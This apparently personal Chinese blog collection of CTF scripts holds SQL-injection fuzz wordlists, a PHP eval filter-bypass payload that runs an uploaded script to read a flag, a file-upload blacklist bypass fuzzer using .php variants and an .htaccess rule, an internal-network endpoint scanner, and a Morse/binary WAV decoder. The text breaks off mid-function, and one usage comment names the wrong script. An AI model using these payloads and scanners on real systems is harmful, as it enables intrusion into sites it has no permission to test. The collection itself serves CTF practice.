6410 字
32 分钟
脚本积累
SQL注入:
fuzz字典:
与bp共同使用。
转义类字典:
'"`\;,()[]{}+-*/%=<>!^|&#----/**/%00%0a单词字典:
ANDORNOTXORUNIONSELECTINSERTUPDATEDELETEDROPCREATEALTERWHEREFROMLIMITORDERGROUPBYHAVINGSLEEPBENCHMARKEXTRACTVALUEUPDATEXMLLOAD_FILEINTOOUTFILE变形测试字典:
sEleCtsel%00ectunion/**/select/*!SELECT*/+SELECT+%53%45%4c%45%43%54(select)检测深层功能限制:
user()database()version()@@version@@datadirchar()ascii()substr()substring()count()concat()group_concat()WEB绕过:
eval执行命令类的一:
import requests
url = "url" # 替换为题目URL
params = { 'cmd': '?><?=`. /???/p?p??????`;'}# POST 上传的文件内容
files = { 'file': ('shell.sh', '#!/bin/sh\ncat /flag.txt')}#!/bin/sh:调取shell,\n:换行,cat /flag.txt:实际执行命令
response = requests.post(url, params=params, files=files)print(response.text)WEB的POST:
import requests
url = "你的url"
headers = { "Cookie": 'user="adm;n"'} //特定头部
session = requests.Session()response = session.get(url, headers=headers)
print(f"状态码: {response.status_code}")print(f"响应内容: {response.text}")
if "login success" in response.text: print("登录成功!当前 Session Cookie 为:") print(session.cookies.get_dict())WEB文件上传的fuzz脚本:
import argparseimport jsonimport randomimport reimport stringfrom dataclasses import dataclassfrom typing import Dict, Iterable, List, Optional, Setfrom urllib.parse import urljoin
import requests
# 默认文件名变异集合:覆盖常见黑名单绕过后缀。DEFAULT_CASES = [ "shell.php", "shell.phtml", "shell.php5", "shell.php7", "shell.PhP", "shell.php ", "shell.php.", "shell.php;.jpg", "shell.php%00.jpg", "shell.php.jpg", "shell.jpg.php", ".htaccess",]
# 三类测试内容:# 1) 普通图片占位(用于伪装图片类上传)# 2) PHP 负载(用于测试是否可执行)# 3) .htaccess 规则(用于测试 Apache 配置覆盖)IMAGE_PLACEHOLDER = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x02\x00\x00\x00\x90wS\xde\x00\x00\x00\nIDATx\x9cc`\x00\x00\x00\x02\x00\x01\xe2!\xbc3\x00\x00\x00\x00IEND\xaeB`\x82"PHP_PAYLOAD = b"<?php echo 'upload_test_ok'; ?>"HTACCESS_PAYLOAD = b"AddType application/x-httpd-php .png\n"
@dataclassclass CaseResult: # 单个测试用例的结果汇总 filename: str upload_status: Optional[int] upload_ok_hint: bool upload_message: str probe_results: List[str]
def random_tag(length: int = 6) -> str: # 生成随机前缀,避免重复文件名导致结果污染 return "".join(random.choice(string.ascii_lowercase + string.digits) for _ in range(length))
def normalize_base(base: str) -> str: # 统一 base URL:补齐协议并去掉末尾斜杠 if not base.startswith(("http://", "https://")): return "http://" + base.strip("/") return base.rstrip("/")
def detect_upload_field(session: requests.Session, upload_url: str, timeout: int) -> str: # 自动探测上传字段名(常见字段逐个试) common_fields = ["file", "upload", "image", "avatar", "img", "files[]"] for field in common_fields: files = {field: ("field_probe.txt", b"probe", "text/plain")} try: r = session.post(upload_url, files=files, timeout=timeout) text = (r.text or "").lower() if r.status_code < 500 and "missing" not in text and "required" not in text: return field except requests.RequestException: continue return "file"
def read_wordlist(path: str) -> List[str]: # 读取自定义文件名词典,跳过空行和注释行 out: List[str] = [] with open(path, "r", encoding="utf-8", errors="ignore") as f: for raw in f: name = raw.strip() if not name or name.startswith("#"): continue out.append(name) return out
def looks_like_success(status_code: Optional[int], text: str) -> bool: # 根据状态码和关键字粗略判断“上传看起来成功” if status_code is not None and 200 <= status_code < 300: return True hit_words = [ "success", "上传成功", "ok", "done", "saved", ] low = text.lower() return any(w in low for w in hit_words)
def looks_like_exists(status_code: int) -> bool: # 这些状态一般表示资源“存在或可达”(403 也纳入) return status_code in (200, 301, 302, 401, 403)
def collect_strings(obj) -> Iterable[str]: # 递归展开 JSON 内所有字符串,便于提取可能路径 if isinstance(obj, dict): for k, v in obj.items(): if isinstance(k, str): yield k yield from collect_strings(v) elif isinstance(obj, list): for item in obj: yield from collect_strings(item) elif isinstance(obj, str): yield obj
def extract_candidates_from_response(base: str, upload_dir: str, filename: str, body: str) -> List[str]: # 从接口响应中提取“可能的上传文件 URL” candidates: Set[str] = set()
# 1) 直接提取完整 URL for m in re.findall(r"https?://[^\s\"'<>]+", body): candidates.add(m.strip())
# 2) 若响应是 JSON,则递归提取字段值中的路径线索 parsed_json = None try: parsed_json = json.loads(body) except Exception: parsed_json = None
if parsed_json is not None: for token in collect_strings(parsed_json): t = token.strip().strip("\"'") if not t: continue if t.startswith(("http://", "https://")): candidates.add(t) elif t.startswith("/"): candidates.add(urljoin(base + "/", t.lstrip("/"))) elif "/" in t or "." in t: candidates.add(urljoin(base + "/", t.lstrip("/")))
# 3) 在原始文本里搜 /xxx 形态路径(含 upload 关键字或文件名) for m in re.findall(r"(/[^\"'\s<>]+)", body): if "upload" in m.lower() or filename in m: candidates.add(urljoin(base + "/", m.lstrip("/")))
# 4) 补一条兜底路径:<upload_dir>/<filename> upload_dir = upload_dir.strip("/") candidates.add(urljoin(base + "/", f"{upload_dir}/{filename}")) return sorted(candidates)
def build_payload(filename: str) -> bytes: # 按文件名后缀选择上传内容 name_l = filename.lower() if name_l == ".htaccess": return HTACCESS_PAYLOAD if any(name_l.endswith(x) for x in [".php", ".phtml", ".php5", ".php7", ".phar"]): return PHP_PAYLOAD return IMAGE_PLACEHOLDER
def guess_content_type(filename: str) -> str: # 按后缀猜测 Content-Type,模拟更真实上传行为 name_l = filename.lower() if name_l == ".htaccess": return "text/plain" if any(name_l.endswith(x) for x in [".php", ".phtml", ".php5", ".php7", ".phar"]): return "application/x-httpd-php" if name_l.endswith((".jpg", ".jpeg")): return "image/jpeg" if name_l.endswith(".gif"): return "image/gif" return "image/png"
def probe_urls(session: requests.Session, urls: List[str], timeout: int) -> List[str]: # 回访候选 URL,判断文件是否“可能已存在” results: List[str] = [] for u in urls: try: r = session.get(u, timeout=timeout, allow_redirects=False) marker = "EXISTS?" if looks_like_exists(r.status_code) else "MISS" results.append(f"[{marker}] {r.status_code:3d} {u}") except requests.RequestException as e: results.append(f"[ERR ] --- {u} ({e})") return results
def infer_followup_advice(result: CaseResult) -> List[str]: """ 根据单个用例的上传回显与探测结果,给出下一步测试/排查思路。 说明:这里只给风险判断与验证建议,不提供利用细节。 """ tips: List[str] = [] msg = result.upload_message msg_low = msg.lower() name_low = result.filename.lower() exists_lines = [x for x in result.probe_results if "[EXISTS?]" in x] has_403 = any(" 403 " in x for x in exists_lines)
# 常见“类型拦截”提示 if any(k in msg for k in ["非法类型", "类型不允许"]) or any( k in msg_low for k in ["invalid type", "forbidden type", "not allowed"] ): tips.append("类型黑名单命中:当前变体被拦截,建议继续记录被拦截后缀与MIME组合,反向推断过滤规则。")
# .htaccess 场景:403 往往意味着文件存在但被访问控制 if name_low == ".htaccess" and exists_lines: if has_403: tips.append(".htaccess 回访为 403:大概率已落盘且受访问控制,优先核查上传目录配置与解析策略。") else: tips.append(".htaccess 可访问:上传目录配置风险较高,建议立即复核服务器限制策略。")
# 危险扩展(仅做风险提示,不给利用方式) dangerous_exts = [".php", ".phtml", ".php5", ".php7", ".phar"] if any(name_low.endswith(ext) for ext in dangerous_exts) and exists_lines: tips.append("危险扩展疑似可访问:风险级别高,建议在授权环境按应急流程进行隔离、取证与修复。")
# 常见“重命名为图片”线索 if any(ext in msg_low for ext in [".png", ".jpg", ".jpeg", ".gif"]) and any( ext in name_low for ext in dangerous_exts ): tips.append("服务端可能强制重命名为图片扩展:可继续验证最终保存名、存储目录和解析链是否一致。")
if not tips: tips.append("回显信息不足:建议补充记录最终文件名、访问状态码、响应头和静态文件服务器行为。") return tips[:3]
def run_case( session: requests.Session, base: str, upload_url: str, upload_dir: str, field_name: str, timeout: int, filename: str,) -> CaseResult: # 执行单个测试用例:上传 -> 解析响应 -> 回访探测 payload = build_payload(filename) ctype = guess_content_type(filename) files = {field_name: (filename, payload, ctype)}
upload_status: Optional[int] = None upload_text = "" try: r = session.post(upload_url, files=files, timeout=timeout) upload_status = r.status_code upload_text = (r.text or "").strip() except requests.RequestException as e: upload_text = str(e)
upload_hint = looks_like_success(upload_status, upload_text) # 提取候选地址并限制输出数量,避免刷屏 candidates = extract_candidates_from_response( base, upload_dir, filename, upload_text, ) probes = probe_urls(session, candidates, timeout=timeout)[:12] msg = upload_text[:180].replace("\n", "\\n") return CaseResult( filename=filename, upload_status=upload_status, upload_ok_hint=upload_hint, upload_message=msg, probe_results=probes, )
def main() -> None: # 仅用于授权测试:批量测试上传黑名单绕过场景 parser = argparse.ArgumentParser( description="Generic upload blacklist bypass fuzzer (authorized testing only)." ) parser.add_argument("--base", required=True, help="Target base URL, e.g. http://127.0.0.1") parser.add_argument("--upload-path", default="/upload.php", help="Upload endpoint path") parser.add_argument("--upload-dir", default="/uploads", help="Public upload directory") parser.add_argument("--field", default="", help="Multipart field name, auto-detect if empty") parser.add_argument("--wordlist", default="", help="Custom filename list (one per line)") parser.add_argument("--timeout", type=int, default=10, help="HTTP timeout seconds") parser.add_argument("--prefix", default="", help="Optional filename prefix") parser.add_argument("--random-tag", action="store_true", help="Prepend random tag to non-.htaccess names") args = parser.parse_args()
base = normalize_base(args.base) upload_url = urljoin(base + "/", args.upload_path.lstrip("/"))
# 文件名来源:自定义词典优先,否则使用内置变异集合 if args.wordlist: filenames = read_wordlist(args.wordlist) else: filenames = DEFAULT_CASES.copy()
# 可选文件名前缀:固定前缀或随机前缀(二选一) if args.prefix: filenames = [f"{args.prefix}{name}" if name != ".htaccess" else name for name in filenames] elif args.random_tag: tag = random_tag() filenames = [f"{tag}_{name}" if name != ".htaccess" else name for name in filenames]
session = requests.Session() # 未手动指定字段时,自动探测上传字段名 field_name = args.field.strip() or detect_upload_field(session, upload_url, timeout=args.timeout)
print(f"[+] base : {base}") print(f"[+] upload_url : {upload_url}") print(f"[+] upload_dir : {args.upload_dir}") print(f"[+] field : {field_name}") print(f"[+] test_count : {len(filenames)}") print()
hits = 0 for idx, name in enumerate(filenames, start=1): result = run_case( session=session, base=base, upload_url=upload_url, upload_dir=args.upload_dir, field_name=field_name, timeout=args.timeout, filename=name, ) status_str = str(result.upload_status) if result.upload_status is not None else "---" yesno = "Y" if result.upload_ok_hint else "N" print(f"[{idx:02d}] {result.filename}") print(f" upload_status={status_str} success_hint={yesno}") print(f" resp={result.upload_message}") for line in result.probe_results: print(f" {line}") for tip in infer_followup_advice(result): print(f" [advice] {tip}") # 只要有一个候选 URL 命中 EXISTS?,该用例记为命中 if any("EXISTS?" in x for x in result.probe_results): hits += 1 print()
print(f"[+] done. cases_with_possible_uploaded_file={hits}/{len(filenames)}") print("[*] Note: 403 on /uploads/.htaccess usually indicates file exists but directory listing/access is denied.")
if __name__ == "__main__": main()# 用法:python fuzz_upload_blacklist.py --base "http://目标地址" --upload-path "/upload.php" --upload-dir "/uploads"WEB扫描内外网脚本:
#!/usr/bin/env python3# -*- coding: utf-8 -*-"""授权安全测试用:内网/外网接口通用扫描脚本(偏侦察,不含利用逻辑)
功能概览:1) 扫描外网基址 +(可选)内网基址上的接口可达性2) 记录状态码、耗时、关键响应头与响应摘要3) 对比同一路径在外网/内网的差异,辅助发现 ACL 配置风险4) 结果保存为 JSON,便于后续复盘"""
import argparseimport jsonimport timefrom concurrent.futures import ThreadPoolExecutor, as_completedfrom dataclasses import asdict, dataclassfrom typing import Dict, Iterable, List, Optional, Tuplefrom urllib.parse import urljoin, urlparse
import requests
# 默认路径词典:覆盖常见外网接口与题目中常见内网接口前缀DEFAULT_PATHS = [ "/", "/robots.txt", "/api/info", "/api/health", "/api/status", "/api/sandbox/execute", "/internal/admin", "/internal/config", "/internal/secret-fragment",]
@dataclassclass ProbeResult: # 单条探测结果,后续可直接转 JSON scope: str method: str path: str url: str status_code: Optional[int] elapsed_ms: int body_size: int body_preview: str server: str x_parser: str hint: str error: str
def normalize_base(base: str) -> str: # 统一 base 格式,自动补齐协议并去掉末尾斜杠 base = base.strip() if not base: return "" if not base.startswith(("http://", "https://")): base = "http://" + base return base.rstrip("/")
def parse_headers(header_items: Optional[List[str]]) -> Dict[str, str]: # 解析命令行 --header "K: V" headers: Dict[str, str] = {} if not header_items: return headers for item in header_items: if ":" not in item: continue k, v = item.split(":", 1) k = k.strip() v = v.strip() if k: headers[k] = v return headers
def read_paths_file(path: str) -> List[str]: # 从文件读取路径词典,忽略空行与注释行 out: List[str] = [] with open(path, "r", encoding="utf-8", errors="ignore") as f: for raw in f: line = raw.strip() if not line or line.startswith("#"): continue if not line.startswith("/"): line = "/" + line out.append(line) return out
def dedupe_keep_order(items: Iterable[str]) -> List[str]: # 去重并保留输入顺序,便于结果可读 seen = set() out: List[str] = [] for item in items: if item in seen: continue seen.add(item) out.append(item) return out
def safe_preview(text: str, limit: int = 100) -> str: # 生成响应体摘要,避免终端刷屏 if not text: return "" return text.replace("\r", "\\r").replace("\n", "\\n")[:limit]
def infer_hint(scope: str, path: str, status_code: Optional[int], x_parser: str) -> str: # 根据结果给出轻量提示(只做风险标记,不做利用建议) if status_code is None: return "请求失败"
hints: List[str] = [] if path.startswith("/internal/") and scope == "external" and status_code in (200, 401, 403): hints.append("外网疑似可见内网接口") if status_code in (401, 403): hints.append("接口存在但受限") if x_parser: hints.append("发现X-Parser响应头") if not hints: if 200 <= status_code < 300: return "可达" if status_code in (404,): return "未发现" return "需人工复核" return ";".join(hints)
def probe_once( session: requests.Session, scope: str, base: str, path: str, method: str, timeout: int, verify_tls: bool, headers: Dict[str, str], post_json: str,) -> ProbeResult: # 发起单次请求并回收元信息 url = urljoin(base + "/", path.lstrip("/")) body_preview = "" server = "" x_parser = "" error = "" status_code: Optional[int] = None body_size = 0
started = time.perf_counter() try: method_u = method.upper() if method_u == "POST": r = session.post( url, data=post_json.encode("utf-8"), headers=headers, timeout=timeout, verify=verify_tls, allow_redirects=False, ) else: r = session.request( method_u, url, headers=headers, timeout=timeout, verify=verify_tls, allow_redirects=False, ) status_code = r.status_code body_size = len(r.content or b"") body_preview = safe_preview(r.text or "") server = r.headers.get("Server", "") x_parser = r.headers.get("X-Parser", "") except requests.RequestException as exc: error = str(exc) elapsed_ms = int((time.perf_counter() - started) * 1000)
hint = infer_hint(scope=scope, path=path, status_code=status_code, x_parser=x_parser) return ProbeResult( scope=scope, method=method.upper(), path=path, url=url, status_code=status_code, elapsed_ms=elapsed_ms, body_size=body_size, body_preview=body_preview, server=server, x_parser=x_parser, hint=hint, error=error, )
def diff_external_internal(results: List[ProbeResult]) -> List[Dict[str, object]]: # 对比同一路径在 external/internal 的状态差异 table: Dict[Tuple[str, str], Dict[str, ProbeResult]] = {} for r in results: key = (r.method, r.path) if key not in table: table[key] = {} table[key][r.scope] = r
diffs: List[Dict[str, object]] = [] for (method, path), pair in table.items(): ext = pair.get("external") inn = pair.get("internal") if not ext or not inn: continue if ext.status_code != inn.status_code: diffs.append( { "method": method, "path": path, "external_status": ext.status_code, "internal_status": inn.status_code, "external_hint": ext.hint, "internal_hint": inn.hint, } ) return diffs
def print_result_line(r: ProbeResult) -> None: # 统一行输出格式,便于肉眼快速筛选 code = "---" if r.status_code is None else f"{r.status_code:3d}" err = f" err={r.error}" if r.error else "" parser_text = f" X-Parser={r.x_parser}" if r.x_parser else "" print( f"[{r.scope:8s}] [{r.method:7s}] {code} " f"{r.elapsed_ms:4d}ms {r.body_size:5d}B {r.path} | {r.hint}{parser_text}{err}" )
def main() -> None: parser = argparse.ArgumentParser( description="Authorized internal/external surface scanner (recon only)." ) parser.add_argument("--external-base", required=True, help="外网基址,如 http://target.com") parser.add_argument("--internal-base", default="", help="内网基址(可选),如 http://127.0.0.1:8080") parser.add_argument("--paths-file", default="", help="路径词典文件(每行一个路径)") parser.add_argument("--add-path", action="append", default=[], help="追加单个路径,可多次传入") parser.add_argument("--method", action="append", default=[], help="HTTP 方法,可重复,如 --method GET --method POST") parser.add_argument("--post-json", default="{}", help="POST 请求体(字符串)") parser.add_argument("--header", action="append", default=[], help='自定义请求头,如 --header "Authorization: Bearer xxx"') parser.add_argument("--timeout", type=int, default=8, help="请求超时(秒)") parser.add_argument("--threads", type=int, default=8, help="并发数") parser.add_argument("--insecure", action="store_true", help="忽略 TLS 证书校验") parser.add_argument("--output", default="surface_scan_result.json", help="结果 JSON 输出路径") args = parser.parse_args()
external_base = normalize_base(args.external_base) internal_base = normalize_base(args.internal_base) if args.internal_base else "" methods = [m.upper() for m in (args.method or ["GET"])] methods = dedupe_keep_order(methods)
# 组装路径:文件词典 > 默认词典,再叠加 --add-path if args.paths_file: paths = read_paths_file(args.paths_file) else: paths = DEFAULT_PATHS.copy() for p in args.add_path: p = p.strip() if not p: continue if not p.startswith("/"): p = "/" + p paths.append(p) paths = dedupe_keep_order(paths)
headers = parse_headers(args.header) verify_tls = not args.insecure
print(f"[+] external_base : {external_base}") print(f"[+] internal_base : {internal_base or '(未提供)'}") print(f"[+] methods : {', '.join(methods)}") print(f"[+] path_count : {len(paths)}") print(f"[+] threads : {args.threads}") print()
tasks: List[Tuple[str, str, str]] = [] for path in paths: for method in methods: tasks.append(("external", external_base, path + f"::{method}")) if internal_base: tasks.append(("internal", internal_base, path + f"::{method}"))
all_results: List[ProbeResult] = [] session = requests.Session() with ThreadPoolExecutor(max_workers=max(1, args.threads)) as pool: future_map = {} for scope, base, packed in tasks: path, method = packed.rsplit("::", 1) future = pool.submit( probe_once, session, scope, base, path, method, args.timeout, verify_tls, headers, args.post_json, ) future_map[future] = (scope, path, method)
for fut in as_completed(future_map): r = fut.result() all_results.append(r) print_result_line(r)
# 结果排序,让导出文件更稳定 all_results.sort(key=lambda x: (x.scope, x.path, x.method)) diffs = diff_external_internal(all_results)
out_obj = { "meta": { "external_base": external_base, "internal_base": internal_base, "methods": methods, "path_count": len(paths), "result_count": len(all_results), }, "results": [asdict(r) for r in all_results], "external_internal_diff": diffs, } with open(args.output, "w", encoding="utf-8") as f: json.dump(out_obj, f, ensure_ascii=False, indent=2)
ext_hits = sum(1 for r in all_results if r.scope == "external" and r.status_code in (200, 401, 403)) int_hits = sum(1 for r in all_results if r.scope == "internal" and r.status_code in (200, 401, 403)) print() print(f"[+] 扫描完成:共 {len(all_results)} 条结果") print(f"[+] external 可见接口(200/401/403):{ext_hits}") if internal_base: print(f"[+] internal 可见接口(200/401/403):{int_hits}") print(f"[+] 外内网差异项:{len(diffs)}") print(f"[+] JSON 输出:{args.output}")
if __name__ == "__main__": main()
# =========================# 中文用法示例(授权测试)# =========================# 1) 仅扫外网(默认 GET + 内置路径词典)# python generic_surface_scan.py --external-base "http://target.com"## 2) 同时扫外网/内网并对比差异# python generic_surface_scan.py --external-base "http://target.com" --internal-base "http://127.0.0.1:8080"## 常见内网目标速查(仅限授权测试):# - 常见内网网段(RFC1918):10.0.0.0/8、172.16.0.0/12、192.168.0.0/16# - 常见本机/链路地址:127.0.0.1(回环)、169.254.0.0/16(链路本地)# - 常见 Web 端口:80、443、8080、8443、8000、3000、5000、8888、9000# - 可尝试的 --internal-base 示例:# http://127.0.0.1:80# http://127.0.0.1:8080# http://127.0.0.1:8000# http://127.0.0.1:3000# http://127.0.0.1:5000# http://127.0.0.1:8888# http://127.0.0.1:9000# http://192.168.0.1:80# http://192.168.1.1:8080# http://10.0.0.1:80# http://172.16.0.1:8080## 3) 使用自定义路径词典 + GET/POST 双方法# python generic_surface_scan.py --external-base "http://target.com" --paths-file "paths.txt" --method GET --method POST --post-json "{}"## 4) 增加请求头并忽略证书校验(仅测试环境)# python generic_surface_scan.py --external-base "https://target.com" --header "Authorization: Bearer test" --insecure## 5) 指定输出文件# python generic_surface_scan.py --external-base "http://target.com" --output "scan_out.json"MISC莫斯密码和二进制密码分析:
#!/usr/bin/env python3"""Decode hidden pulse messages from WAV audio.
Supported decoding paths:1) Morse code (dot / dash timing)2) Binary pulse stream (on=1 / off=0)
Usage examples: python generic_surface_scan.py sample.wav python generic_surface_scan.py sample.wav --mode morse python generic_surface_scan.py sample.wav --mode binary --json-out result.json"""
from __future__ import annotations
import argparseimport jsonimport mathimport statisticsimport structimport wavefrom dataclasses import asdict, dataclass, fieldfrom pathlib import Pathfrom typing import Dict, List, Sequence, Tuple
Run = Tuple[int, int] # (state, duration_frames) where state is 0 or 1
MORSE_TO_TEXT: Dict[str, str] = { ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F", "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L", "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R", "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X", "-.--": "Y", "--..": "Z", "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4", ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9", ".-.-.-": ".", "--..--": ",", "..--..": "?", ".----.": "'", "-.-.--": "!", "-..-.": "/", "-.--.": "(", "-.--.-": ")", ".-...": "&", "---...": ":", "-.-.-.": ";", "-...-": "=", ".-.-.": "+", "-....-": "-", "..--.-": "_", ".-..-.": '"', "...-..-": "$", ".--.-.": "@",}
@dataclassclass SignalStats: sample_rate: int duration_sec: float frame_ms: float frame_count: int threshold: float run_count: int active_ratio: float
@dataclassclass MorseResult: dot_unit_frames: int = 0 symbol_count: int = 0 unknown_count: int = 0 known_ratio: float = 0.0 morse_symbols: str = "" decoded_text: str = ""
@dataclassclass BinaryCandidate: bit_order: str offset_bits: int encoding: str score: float text: str byte_length: int
@dataclassclass BinaryResult: bit_unit_frames: int = 0 bitstream_length: int = 0 bitstream_preview: str = "" best_text: str = "" best_score: float = 0.0 best_bit_order: str = "" best_offset_bits: int = 0 best_encoding: str = "" candidates: List[BinaryCandidate] = field(default_factory=list)
def percentile(values: Sequence[float], p: float) -> float: if not values: return 0.0 if p <= 0: return float(min(values)) if p >= 1: return float(max(values)) arr = sorted(float(v) for v in values) idx = int(round((len(arr) - 1) * p)) return arr[idx]
def safe_text_preview(text: str, limit: int = 200) -> str: return text.replace("\r", "\\r").replace("\n", "\\n")[:limit]
def load_wav_mono(path: Path) -> Tuple[List[float], int]: with wave.open(str(path), "rb") as wf: channels = wf.getnchannels() sample_width = wf.getsampwidth() sample_rate = wf.getframerate() frame_count = wf.getnframes() raw = wf.readframes(frame_count)
if channels <= 0: raise ValueError("invalid WAV channel count") if sample_width not in (1, 2, 3, 4): raise ValueError(f"unsupported WAV sample width: {sample_width} bytes")
if sample_width == 1: samples = [float(b - 128) for b in raw] elif sample_width == 2: n = len(raw) // 2 samples = [float(v) for v in struct.unpack(f"<{n}h", raw)] elif sample_width == 4: n = len(raw) // 4 samples = [float(v) for v in struct.unpack(f"<{n}i", raw)] else: samples = [] for i in range(0, len(raw), 3): chunk = raw[i : i + 3] if len(chunk) < 3: break sign = b"\xff" if (chunk[2] & 0x80) else b"\x00" val = int.from_bytes(chunk + sign, "little", signed=True) samples.append(float(val))
if channels > 1: mono: List[float] = [] for i in range(0, len(samples), channels): frame = samples[i : i + channels] if len(frame) < channels: break mono.append(sum(frame) / channels) else: mono = samples
peak = max((abs(v) for v in mono), default=0.0) if peak == 0: return [0.0 for _ in mono], sample_rate return [v / peak for v in mono], sample_rate
def compute_rms_envelope(samples: Sequence[float], sample_rate: int, frame_ms: float) -> Tuple[List[float], int]: frame_size = max(1, int(round(sample_rate * frame_ms / 1000.0))) env: List[float] = [] for i in range(0, len(samples), frame_size): chunk = samples[i : i + frame_size] if not chunk: break energy = sum(v * v for v in chunk) / len(chunk) env.append(math.sqrt(energy)) return env, frame_size
def make_threshold(envelope: Sequence[float]) -> float: if not envelope: return 0.0 low = percentile(envelope, 0.20) high = percentile(envelope, 0.85) if high <= low: high = max(envelope) threshold = low + (high - low) * 0.35 if threshold <= 0: threshold = max(envelope) * 0.2 return threshold
def runs_from_states(states: Sequence[int]) -> List[Run]: if not states: return [] out: List[Run] = [] cur = states[0] dur = 1 for s in states[1:]: if s == cur: dur += 1 continue out.append((cur, dur)) cur = s dur = 1 out.append((cur, dur)) return out
def merge_adjacent_runs(runs: Sequence[Run]) -> List[Run]: merged: List[Run] = [] for state, dur in runs: if dur <= 0: continue if merged and merged[-1][0] == state: merged[-1] = (state, merged[-1][1] + dur) else: merged.append((state, dur)) return merged
def smooth_runs(runs: Sequence[Run], min_frames: int) -> List[Run]: if min_frames <= 1: return list(runs) out = list(runs) changed = True while changed and len(out) >= 3: changed = False i = 1 while i < len(out) - 1: state, dur = out[i] if dur < min_frames and out[i - 1][0] == out[i + 1][0]: combined = (out[i - 1][0], out[i - 1][1] + dur + out[i + 1][1]) out[i - 1 : i + 2] = [combined] changed = True i = max(1, i - 1) continue i += 1 return merge_adjacent_runs(out)
def estimate_time_unit(durations: Sequence[int]) -> float: values = sorted(float(v) for v in durations if v > 0) if not values: return 1.0 cutoff = max(1, int(round(len(values) * 0.35))) unit = statistics.median(values[:cutoff]) return max(1.0, unit)
def decode_morse(runs: Sequence[Run]) -> MorseResult: on_durations = [dur for state, dur in runs if state == 1] if not on_durations: return MorseResult()
dot = estimate_time_unit(on_durations) dash_threshold = dot * 2.4 intra_gap_threshold = dot * 1.7 word_gap_threshold = dot * 5.2
tokens: List[str] = [] current = ""
for state, dur in runs: if state == 1: current += "-" if dur >= dash_threshold else "." continue
if dur < intra_gap_threshold: continue
if current: tokens.append(current) current = ""
if dur >= word_gap_threshold and tokens and tokens[-1] != "/": tokens.append("/")
if current: tokens.append(current)
decoded_chars: List[str] = [] symbol_count = 0 unknown_count = 0
for tk in tokens: if tk == "/": if decoded_chars and decoded_chars[-1] != " ": decoded_chars.append(" ") continue symbol_count += 1 ch = MORSE_TO_TEXT.get(tk) if ch is None: decoded_chars.append("?") unknown_count += 1 else: decoded_chars.append(ch)
known_ratio = 0.0 if symbol_count > 0: known_ratio = (symbol_count - unknown_count) / symbol_count
return MorseResult( dot_unit_frames=int(round(dot)), symbol_count=symbol_count, unknown_count=unknown_count, known_ratio=known_ratio, morse_symbols=" ".join(tokens), decoded_text="".join(decoded_chars).strip(), )
def score_text_quality(text: str) -> float: if not text: return 0.0
ascii_alnum = 0 ascii_punct = 0 cjk_ok = 0 ws_ok = 0 misc_printable = 0 for ch in text: o = ord(ch) if ch in ("\n", "\r", "\t"): ws_ok += 1 elif ch.isalnum() and o < 128: ascii_alnum += 1 elif 32 <= o <= 126: ascii_punct += 1 elif 0x4E00 <= o <= 0x9FFF: cjk_ok += 1 elif ch.isprintable(): misc_printable += 1
length = max(1, len(text)) base = (ascii_alnum + 0.6 * ascii_punct + cjk_ok + ws_ok + 0.2 * misc_printable) / length nul_penalty = text.count("\x00") / length misc_ratio = misc_printable / length misc_penalty = 0.25 if misc_ratio > 0.35 else 0.0
stripped = text.strip() short_penalty = max(0.0, (4 - len(stripped)) * 0.1) if stripped else 0.5
repeat_penalty = 0.0 if len(stripped) >= 5 and len(set(stripped)) <= 1: repeat_penalty = 0.2
return max(0.0, base - nul_penalty - misc_penalty - short_penalty - repeat_penalty)
def build_bitstream(runs: Sequence[Run], bit_unit: float, trim_edge_zeros: bool) -> str: if bit_unit <= 0: return ""
trimmed_runs = list(runs) if trim_edge_zeros and trimmed_runs: pad_threshold = max(2, int(round(bit_unit * 2))) if trimmed_runs and trimmed_runs[0][0] == 0 and trimmed_runs[0][1] >= pad_threshold: trimmed_runs = trimmed_runs[1:] if trimmed_runs and trimmed_runs[-1][0] == 0 and trimmed_runs[-1][1] >= pad_threshold: trimmed_runs = trimmed_runs[:-1]
chunks: List[str] = [] for state, dur in trimmed_runs: repeat = max(1, int(round(dur / bit_unit))) chunks.append(("1" if state == 1 else "0") * repeat)
bits = "".join(chunks) return bits
def decode_binary( runs: Sequence[Run], trim_edge_zeros: bool, max_text_chars: int = 500, max_candidates: int = 6,) -> BinaryResult: durations = [dur for _, dur in runs if dur > 0] if not durations: return BinaryResult()
bit_unit = estimate_time_unit(durations) bitstream = build_bitstream(runs, bit_unit, trim_edge_zeros=trim_edge_zeros) if not bitstream: return BinaryResult(bit_unit_frames=int(round(bit_unit)))
candidates: List[BinaryCandidate] = [] encodings = ("utf-8", "gb18030", "latin-1")
for order in ("msb", "lsb"): for offset in range(8): shifted = bitstream[offset:] usable = (len(shifted) // 8) * 8 if usable < 8: continue payload = shifted[:usable]
byte_values: List[int] = [] for i in range(0, usable, 8): chunk = payload[i : i + 8] if order == "lsb": chunk = chunk[::-1] byte_values.append(int(chunk, 2)) raw = bytes(byte_values)
for enc in encodings: try: text = raw.decode(enc) except UnicodeDecodeError: text = raw.decode(enc, errors="ignore")
text = text[:max_text_chars] if not text: continue
score = score_text_quality(text) candidates.append( BinaryCandidate( bit_order=order, offset_bits=offset, encoding=enc, score=round(score, 4), text=text, byte_length=len(raw), ) )
candidates.sort(key=lambda c: (c.score, len(c.text)), reverse=True)
unique: List[BinaryCandidate] = [] seen = set() for c in candidates: key = (c.bit_order, c.offset_bits, c.encoding, c.text) if key in seen: continue seen.add(key) unique.append(c) if len(unique) >= max_candidates: break
if not unique: return BinaryResult( bit_unit_frames=int(round(bit_unit)), bitstream_length=len(bitstream), bitstream_preview=bitstream[:240], )
best = unique[0] return BinaryResult( bit_unit_frames=int(round(bit_unit)), bitstream_length=len(bitstream), bitstream_preview=bitstream[:240], best_text=best.text, best_score=best.score, best_bit_order=best.bit_order, best_offset_bits=best.offset_bits, best_encoding=best.encoding, candidates=unique, )
def choose_auto_mode(morse: MorseResult, binary: BinaryResult) -> Tuple[str, float, float]: morse_score = morse.known_ratio if morse.symbol_count < 2: morse_score *= 0.65 else: morse_score *= min(1.0, 0.4 + morse.symbol_count / 6.0)
